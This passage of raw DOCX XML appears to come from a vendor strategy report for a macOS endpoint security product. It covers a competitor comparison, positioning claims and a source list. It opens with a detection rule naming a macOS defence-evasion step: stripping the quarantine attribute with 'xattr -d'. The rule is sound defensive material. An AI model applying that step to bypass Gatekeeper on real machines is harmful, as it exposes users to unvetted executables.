        <w:t xml:space="preserve">Monitor ES_EVENT_TYPE_NOTIFY_DELETEEXTATTR for any removal of com.apple.quarantine. Correlate with the process performing the removal: was it the user via Finder (legitimate) or a script via xattr -d (suspicious)? Track files that bypass quarantine entirely because they were extracted via command-line tools rather than downloaded through a browser. Monitor for the com.apple.provenance attribute and detect modifications to the ExecPolicy database. Alert on any executable that runs without ever having had a quarantine attribute — this indicates it was either extracted via CLI, transferred via AirDrop, or had its quarantine attribute stripped.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 4: Competitive Landscape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The endpoint security market is segmented across categories that rarely overlap. No single vendor covers macOS endpoint security, non-email channel protection, browser isolation, network detection, and AI-driven behavioral analysis simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Direct Competitors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000"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="1960"/>
      </w:tblGrid>
      <w:tr>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Vendor</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macOS Approach</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Strengths</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Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Pricing</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CrowdStrike Falcon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Windows-first, ported to macOS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Market leader; 100-min breakout SLA; strong Windows EDR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Did not participate in 2024 MITRE macOS eval; macOS agent weaker; $60–185/endpoint/yr</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$60–185/endpoint/yr</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SentinelOne Singularity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Windows-first, ported to macOS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 MITRE 2024 detection; strong automated response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macOS agent resource-heavy; BYOI attack exploited own installer; $70–230/endpoint/yr</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$70–230/endpoint/yr</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Jamf Protect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macOS-native (ES API)</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Only truly macOS-native commercial EDR; same-day Apple OS support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Apple-only (no Windows/Linux); no cross-platform correlation; $6–14/device/mo</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$72–164/device/yr</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Microsoft Defender for Endpoint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Cross-platform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 MITRE 2024 macOS detection; included with M365 E5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E5 required for full EDR ($57/user/mo); Plan 1 lacks EDR entirely</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 (E5) or $34K+/yr for 50 users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Palo Alto Cortex XDR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Cross-platform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 MITRE 2024 across all platforms; zero false positives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Complex deployment; premium pricing; requires Palo Alto ecosystem</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 pricing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Open-Source Alternatives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3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Capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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 It Lacks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Wazuh</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Unified XDR/SIEM; macOS agent; 100K+ orgs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Rule-based only; no AI/ML; complex configuration; no behavioral baselines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Objective-See Tools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LuLu (firewall), BlockBlock (persistence), KnockKnock (startup items), RansomWhere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centralized management; no automated response; individual tools, not platform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OSQuery</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SQL-based endpoint querying; powerful forensics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Zero prevention; zero detection alerts; zero response capability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Velociraptor</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Excellent forensics and threat hunting</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real-time prevention; investigation tool only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Elastic Security</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 SIEM; detection rules; macOS support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Advanced ML requires paid tier; macOS rules still maturing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Displaced Customer Bases (Immediate Opportunity)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Three vendor collapses have created displaced customer bases actively seeking alternatives. Cybereason’s valuation collapsed 90% from $3.3 billion to approximately $300 million, culminating in LevelBlue’s acquisition in November 2025. VMware Carbon Black was declared noncore by Broadcom 15 days after the $69 billion VMware acquisition, with market share declining from 3.9% to 3.2%. Cylance was sold by BlackBerry to Arctic Wolf after years of underinvestment. Combined, these represent tens of thousands of organizations that need to migrate to a new endpoint security platform within 12–24 months.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 5: AMOSKYS Strategic Positioning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 The Three-Gap Thesis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AMOSKYS is positioned at the intersection of three structural gaps that no single existing tool addresses:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The macOS Visibility Deficit: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Current EDR tools are Windows-first ports. They lack AppleScript inspection, reliable process tree construction, and Unified Log integration. AMOSKYS is built on macOS, for macOS, using Apple’s own security frameworks and hardware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Non-Email Phishing Blind Spot: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">34%+ of phishing now arrives outside email, through channels with zero inline security scanning. AMOSKYS provides cross-application link provenance tracking that follows threats from messaging apps through browsers to endpoint compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Accessibility Wall: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enterprise EDR costs $60–185/endpoint/year, locking out SMBs and startups. AMOSKYS is open-source with optional premium features, making enterprise-grade behavioral security accessible to every organization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Positioning Anchors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">"Built for macOS, not ported to it" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— Directly challenges CrowdStrike and SentinelOne’s Windows-first approach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">"Security beyond email" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— Addresses the channel gap that Proofpoint and Mimecast cannot cover.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">"Neural-native detection" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— Leverages Apple Silicon’s Neural Engine for on-device ML inference, differentiating from cloud-dependent competitors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">"Enterprise detection at open-source prices" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— Positions against the $60–185/endpoint/year commercial pricing wall.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Where to Compete First</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The highest-impact, lowest-competition positioning is macOS infostealer detection with cross-channel link provenance. This is where attacker activity is highest (400% growth), defender coverage is lowest (5% for non-email phishing), and no existing tool provides adequate protection. Win this category first, establish authority, then expand to Windows/Linux and broader enterprise capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Sources and References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This document draws on primary research from the following sources, verified as of March 2026:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Intelligence Reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verizon 2025 Data Breach Investigations Report (DBIR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CrowdStrike 2025 Global Threat Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IBM X-Force 2024 Cost of a Data Breach Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Picus Security Red Report 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Canary 2024 Threat Detection Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chainalysis 2024 Crypto Crime Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">macOS Security Research</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AEMonitor: Monitoring Apple Events for Malware Analysis (pberba, February 2026)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ESFang: Exploring the macOS Endpoint Security Framework (WithSecure Labs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Malet + Katalina: macOS Malware Dataset (Black Hat Europe 2025)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Patrick Wardle / Objective-See macOS security research corpus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Canary Mac Monitor architecture documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Elastic Security macOS System Extension series (Parts 1–3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vendor Evaluations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Evaluations 2024 (Enterprise, including first macOS scenarios)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gartner Magic Quadrant for Endpoint Protection Platforms 2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Government Advisories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CISA Advisory AA23-144A (Volt Typhoon)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CISA Advisory AA24-038A (PRC State-Sponsored Living off the Land)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CISA/NSA/FBI Joint Advisory on Fast-Flux DNS (April 2025)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-30860 (FORCEDENTRY), CVE-2022-42821 (Achilles), CVE-2023-34362 (MOVEit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-3094 (XZ Utils), CVE-2024-40774 (TCC code-signing downgrade)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
